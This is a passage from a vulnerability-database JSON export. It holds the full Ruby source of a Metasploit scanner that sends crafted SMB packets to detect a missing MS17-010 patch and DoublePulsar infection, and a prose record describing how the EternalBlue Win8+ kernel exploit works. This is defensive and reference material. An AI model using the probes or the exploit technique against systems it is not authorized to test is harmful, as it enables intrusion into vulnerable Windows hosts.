Rex::Proto::SMB::Constants::SMB_TRANS_PKT.make_struct\n simple.client.smb_defaults(pkt['Payload']['SMB'])\n\n # opcode 0x23 = PeekNamedPipe, fid = 0\n setup = \"\\x23\\x00\\x00\\x00\"\n setup_count = 2 # 2 words\n trans = 
\"\\\\PIPE\\\\\\x00\"\n\n # calculate offsets to the SetupData payload\n base_offset = pkt.to_s.length + (setup.length) - 4\n param_offset = base_offset + trans.length\n data_offset = param_offset # + 0\n\n # packet baselines\n pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_TRANSACTION\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\n pkt['Payload']['SMB'].v['Flags2'] = 0x2801 # 0xc803 would unicode\n pkt['Payload']['SMB'].v['TreeID'] = tree_id\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\n pkt['Payload'].v['ParamCountMax'] = 0xffff\n pkt['Payload'].v['DataCountMax'] = 0xffff\n pkt['Payload'].v['ParamOffset'] = param_offset\n pkt['Payload'].v['DataOffset'] = data_offset\n\n # actual magic: PeekNamedPipe FID=0, \\PIPE\\\n pkt['Payload'].v['SetupCount'] = setup_count\n pkt['Payload'].v['SetupData'] = setup\n pkt['Payload'].v['Payload'] = trans\n\n pkt.to_s\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/smb/smb_ms17_010.rb", "title": "MS17-010 SMB RCE Detection", "type": "metasploit", "viewCount": 3099}, "differentElements": ["published", "modified"], "edition": 23, "lastseen": "2019-06-07T18:41:17"}], "viewCount": 4246, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", 
"EDB-ID:41891", "EDB-ID:43970"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", 
"MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2020-08-20T01:40:28", "rev": 2}, "score": {"value": 4.8, "vector": "NONE", "modified": "2020-08-20T01:40:28", "rev": 2}}, "objectVersion": "1.5", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/smb/smb_ms17_010.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::DCERPC\n include Msf::Exploit::Remote::SMB::Client\n include 
Msf::Exploit::Remote::SMB::Client::Authenticated\n include Msf::Exploit::Remote::SMB::Client::PipeAuditor\n\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS17-010 SMB RCE Detection',\n 'Description' => %q{\n Uses information disclosure to determine if MS17-010 has been patched or not.\n Specifically, it connects to the IPC$ tree and attempts a transaction on FID 0.\n If the status returned is \"STATUS_INSUFF_SERVER_RESOURCES\", the machine does\n not have the MS17-010 patch.\n\n If the machine is missing the MS17-010 patch, the module will check for an\n existing DoublePulsar (ring 0 shellcode/malware) infection.\n\n This module does not require valid SMB credentials in default server\n configurations. It can log on as the user \"\\\" and connect to IPC$.\n },\n 'Author' =>\n [\n 'Sean Dillon <sean.dillon@risksense.com>', # @zerosum0x0\n 'Luke Jennings' # DoublePulsar detection Python code\n ],\n 'References' =>\n [\n [ 'CVE', '2017-0143'],\n [ 'CVE', '2017-0144'],\n [ 'CVE', '2017-0145'],\n [ 'CVE', '2017-0146'],\n [ 'CVE', '2017-0147'],\n [ 'CVE', '2017-0148'],\n [ 'MSB', 'MS17-010'],\n [ 'URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\n [ 'URL', 'https://github.com/countercept/doublepulsar-detection-script'],\n [ 'URL', 'https://technet.microsoft.com/en-us/library/security/ms17-010.aspx']\n ],\n 'License' => MSF_LICENSE,\n 'Notes' =>\n {\n 'AKA' => [\n 'DOUBLEPULSAR',\n 'ETERNALBLUE'\n ]\n }\n ))\n\n register_options(\n [\n OptBool.new('CHECK_DOPU', [false, 'Check for DOUBLEPULSAR on vulnerable hosts', true]),\n OptBool.new('CHECK_ARCH', [false, 'Check for architecture on vulnerable hosts', true]),\n OptBool.new('CHECK_PIPE', [false, 'Check for named pipe on vulnerable hosts', false])\n ])\n end\n\n # algorithm to calculate the XOR Key for DoublePulsar knocks\n def calculate_doublepulsar_xor_key(s)\n x = (2 * s ^ (((s & 0xff00 
| (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\n x & 0xffffffff # this line was added just to truncate to 32 bits\n end\n\n # The arch is adjacent to the XOR key in the SMB signature\n def calculate_doublepulsar_arch(s)\n s == 0 ? 'x86 (32-bit)' : 'x64 (64-bit)'\n end\n\n def run_host(ip)\n checkcode = Exploit::CheckCode::Unknown\n\n begin\n ipc_share = \"\\\\\\\\#{ip}\\\\IPC$\"\n\n tree_id = do_smb_setup_tree(ipc_share)\n vprint_status(\"Connected to #{ipc_share} with TID = #{tree_id}\")\n\n status = do_smb_ms17_010_probe(tree_id)\n vprint_status(\"Received #{status} with FID = 0\")\n\n if status == \"STATUS_INSUFF_SERVER_RESOURCES\"\n os = simple.client.peer_native_os\n\n if datastore['CHECK_ARCH']\n case dcerpc_getarch\n when ARCH_X86\n os << ' x86 (32-bit)'\n when ARCH_X64\n os << ' x64 (64-bit)'\n end\n end\n\n print_good(\"Host is likely VULNERABLE to MS17-010! - #{os}\")\n\n checkcode = Exploit::CheckCode::Vulnerable\n\n report_vuln(\n host: ip,\n port: rport, # A service is necessary for the analyze command\n name: self.name,\n refs: self.references,\n info: \"STATUS_INSUFF_SERVER_RESOURCES for FID 0 against IPC$ - #{os}\"\n )\n\n # vulnerable to MS17-010, check for DoublePulsar infection\n if datastore['CHECK_DOPU']\n code, signature1, signature2 = do_smb_doublepulsar_probe(tree_id)\n\n if code == 0x51\n xor_key = calculate_doublepulsar_xor_key(signature1).to_s(16).upcase\n arch = calculate_doublepulsar_arch(signature2)\n print_warning(\"Host is likely INFECTED with DoublePulsar! 
- Arch: #{arch}, XOR Key: 0x#{xor_key}\")\n report_vuln(\n host: ip,\n name: \"MS17-010 DoublePulsar Infection\",\n refs: self.references,\n info: \"MultiPlexID += 0x10 on Trans2 request - Arch: #{arch}, XOR Key: 0x#{xor_key}\"\n )\n end\n end\n\n if datastore['CHECK_PIPE']\n pipe_name, _ = check_named_pipes(return_first: true)\n\n return unless pipe_name\n\n print_good(\"Named pipe found: #{pipe_name}\")\n\n report_note(\n host: ip,\n port: rport,\n proto: 'tcp',\n sname: 'smb',\n type: 'MS17-010 Named Pipe',\n data: pipe_name\n )\n end\n elsif status == \"STATUS_ACCESS_DENIED\" or status == \"STATUS_INVALID_HANDLE\"\n # STATUS_ACCESS_DENIED (Windows 10) and STATUS_INVALID_HANDLE (others)\n print_error(\"Host does NOT appear vulnerable.\")\n else\n print_error(\"Unable to properly detect if host is vulnerable.\")\n end\n\n rescue ::Interrupt\n print_status(\"Exiting on interrupt.\")\n raise $!\n rescue ::Rex::Proto::SMB::Exceptions::LoginError\n print_error(\"An SMB Login Error occurred while connecting to the IPC$ tree.\")\n rescue ::Exception => e\n vprint_error(\"#{e.class}: #{e.message}\")\n ensure\n disconnect\n end\n\n checkcode\n end\n\n def do_smb_setup_tree(ipc_share)\n connect(versions: [1])\n\n # logon as user \\\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\n\n # connect to IPC$\n simple.connect(ipc_share)\n\n # return tree\n return simple.shares[ipc_share]\n end\n\n def do_smb_doublepulsar_probe(tree_id)\n # make doublepulsar knock\n pkt = make_smb_trans2_doublepulsar(tree_id)\n\n sock.put(pkt)\n bytes = sock.get_once\n\n # convert packet to response struct\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\n pkt.from_s(bytes[4..-1])\n\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\n end\n\n def do_smb_ms17_010_probe(tree_id)\n # request transaction with fid = 0\n pkt = make_smb_trans_ms17_010(tree_id)\n sock.put(pkt)\n bytes = 
sock.get_once\n\n # convert packet to response struct\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\n pkt.from_s(bytes[4..-1])\n\n # convert error code to string\n code = pkt['SMB'].v['ErrorClass']\n smberr = Rex::Proto::SMB::Exceptions::ErrorCode.new\n\n return smberr.get_error(code)\n end\n\n def make_smb_trans2_doublepulsar(tree_id)\n # make a raw transaction packet\n # this one is a trans2 packet, the checker is trans\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\n simple.client.smb_defaults(pkt['Payload']['SMB'])\n\n # opcode 0x0e = SESSION_SETUP\n setup = \"\\x0e\\x00\\x00\\x00\"\n setup_count = 1 # 1 word\n trans = \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n # calculate offsets to the SetupData payload\n base_offset = pkt.to_s.length + (setup.length) - 4\n param_offset = base_offset + trans.length\n data_offset = param_offset # + 0\n\n # packet baselines\n pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_TRANSACTION2\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\n pkt['Payload']['SMB'].v['MultiplexID'] = 65\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\n pkt['Payload']['SMB'].v['TreeID'] = tree_id\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\n pkt['Payload'].v['Timeout'] = 0x00a4d9a6\n pkt['Payload'].v['ParamCountTotal'] = 12\n pkt['Payload'].v['ParamCount'] = 12\n pkt['Payload'].v['ParamCountMax'] = 1\n pkt['Payload'].v['DataCountMax'] = 0\n pkt['Payload'].v['ParamOffset'] = 66\n pkt['Payload'].v['DataOffset'] = 78\n\n pkt['Payload'].v['SetupCount'] = setup_count\n pkt['Payload'].v['SetupData'] = setup\n pkt['Payload'].v['Payload'] = trans\n\n pkt.to_s\n end\n\n def make_smb_trans_ms17_010(tree_id)\n # make a raw transaction packet\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_PKT.make_struct\n simple.client.smb_defaults(pkt['Payload']['SMB'])\n\n # opcode 0x23 = PeekNamedPipe, fid = 0\n setup = \"\\x23\\x00\\x00\\x00\"\n setup_count = 2 # 2 words\n trans = 
\"\\\\PIPE\\\\\\x00\"\n\n # calculate offsets to the SetupData payload\n base_offset = pkt.to_s.length + (setup.length) - 4\n param_offset = base_offset + trans.length\n data_offset = param_offset # + 0\n\n # packet baselines\n pkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_TRANSACTION\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\n pkt['Payload']['SMB'].v['Flags2'] = 0x2801 # 0xc803 would unicode\n pkt['Payload']['SMB'].v['TreeID'] = tree_id\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\n pkt['Payload'].v['ParamCountMax'] = 0xffff\n pkt['Payload'].v['DataCountMax'] = 0xffff\n pkt['Payload'].v['ParamOffset'] = param_offset\n pkt['Payload'].v['DataOffset'] = data_offset\n\n # actual magic: PeekNamedPipe FID=0, \\PIPE\\\n pkt['Payload'].v['SetupCount'] = setup_count\n pkt['Payload'].v['SetupData'] = setup\n pkt['Payload'].v['Payload'] = trans\n\n pkt.to_s\n end\nend\n", "metasploitReliability": "", "metasploitHistory": "", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.metasploit.MetasploitBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": 
"3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "142f691ada068c40ae71fdd0eac8502e"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "52e40933ae55680339314c4c47c4218f"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "a350165a58d78e6a7f1ec63091a5caba"}, {"key": "published", "hash": "35e1b19fef57800a5842324245a84fa8"}, {"key": "references", "hash": "69112e68efb0c9ff708d829d011d07e9"}, {"key": "reporter", "hash": "74798933f90c8c8a3dcac277d7c31e76"}, {"key": "title", "hash": "76342054b3e7ed2a9d215428f6b2e311"}, {"key": "type", "hash": "6719951e37a5b7c4b959f8df50c9d641"}], "scheme": null}, {"id": "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "hash": "2edf1b51caf23fee7da6fbe8c1ee78e99dad2e9443e342b20d7988a241d64851", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+", "description": "EternalBlue exploit for Windows 8, Windows 10, and 2012 by sleepya The exploit might FAIL and CRASH a target system (depended on what is overwritten) The exploit support only x64 target Tested on: \\- Windows 2012 R2 x64 \\- Windows 8.1 x64 \\- Windows 10 Pro Build 10240 x64 \\- Windows 10 Enterprise Evaluation Build 10586 x64 Default Windows 8 and later installation without additional service info: \\- anonymous is not allowed to access any share (including IPC$) \\- More info: https://support.microsoft.com/en-us/help/3034016/ipc-share-and-null-session-behavior-in-windows \\- tcp port 445 is filtered by firewall Reference: \\- http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/ \\- 
\"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" https://drive.google.com/file/d/0B3P18M-shbwrNWZTa181ZWRCclk/edit Exploit info: \\- If you do not know how exploit for Windows 7/2008 work. Please read my exploit for Windows 7/2008 at https://gist.github.com/worawit/bd04bad3cd231474763b873df081c09a because the trick for exploit is almost the same \\- The exploit use heap of HAL for placing fake struct (address 0xffffffffffd00e00) and shellcode (address 0xffffffffffd01000). On Windows 8 and Wndows 2012, the NX bit is set on this memory page. Need to disable it before controlling RIP. \\- The exploit is likely to crash a target when it failed \\- The overflow is happened on nonpaged pool so we need to massage target nonpaged pool. \\- If exploit failed but target does not crash, try increasing 'GroomAllocations' value (at least 5) \\- See the code and comment for exploit detail. Disable NX method: \\- The idea is from \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" (see link in reference) \\- The exploit is also the same but we need to trigger bug twice \\- First trigger, set MDL.MappedSystemVa to target pte address \\- Write '\\x00' to disable the NX flag \\- Second trigger, do the same as Windows 7 exploit \\- From my test, if exploit disable NX successfully, I always get code execution\n", "published": "2018-06-18T16:41:57", "modified": "2019-11-02T02:20:22", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://github.com/worawit/MS17-010"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", 
"CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "lastseen": "2020-09-18T18:32:29", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "description": "EternalBlue exploit for Windows 8, Windows 10, and 2012 by sleepya The exploit might FAIL and CRASH a target system (depended on what is overwritten) The exploit support only x64 target Tested on: \\- Windows 2012 R2 x64 \\- Windows 8.1 x64 \\- Windows 10 Pro Build 10240 x64 \\- Windows 10 Enterprise Evaluation Build 10586 x64 Default Windows 8 and later installation without additional service info: \\- anonymous is not allowed to access any share (including IPC$) \\- More info: https://support.microsoft.com/en-us/help/3034016/ipc-share-and-null-session-behavior-in-windows \\- tcp port 445 is filtered by firewall Reference: \\- http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/ \\- \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" https://drive.google.com/file/d/0B3P18M-shbwrNWZTa181ZWRCclk/edit Exploit info: \\- If you do not know how exploit for Windows 7/2008 work. Please read my exploit for Windows 7/2008 at https://gist.github.com/worawit/bd04bad3cd231474763b873df081c09a because the trick for exploit is almost the same \\- The exploit use heap of HAL for placing fake struct (address 0xffffffffffd00e00) and shellcode (address 0xffffffffffd01000). On Windows 8 and Wndows 2012, the NX bit is set on this memory page. Need to disable it before controlling RIP. \\- The exploit is likely to crash a target when it failed \\- The overflow is happened on nonpaged pool so we need to massage target nonpaged pool. \\- If exploit failed but target does not crash, try increasing 'GroomAllocations' value (at least 5) \\- See the code and comment for exploit detail. 
Disable NX method: \\- The idea is from \"Bypassing Windows 10 kernel ASLR (remote) by Stefan Le Berre\" (see link in reference) \\- The exploit is also the same but we need to trigger bug twice \\- First trigger, set MDL.MappedSystemVa to target pte address \\- Write '\\x00' to disable the NX flag \\- Second trigger, do the same as Windows 7 exploit \\- From my test, if exploit disable NX successfully, I always get code execution\n", "edition": 1, "enchantments": {"dependencies": {"modified": "2020-09-18T18:32:29", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["KB4013389", "KB4012598"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, 
{"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"], "type": "malwarebytes"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": 
"exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-09-18T18:32:29", "rev": 2, "value": 7.5, "vector": "NONE"}}, "hash": "437b5fe7da2be13bd1427ad43d5d290b7ff1ed11518cae3d7dda200faae3ebb1", "hashmap": [{"hash": "b60f5906fe6c7ab38d837f22d4eafee6", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "6c1573fb8afad953575e88410f63a2fc", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "href"}, 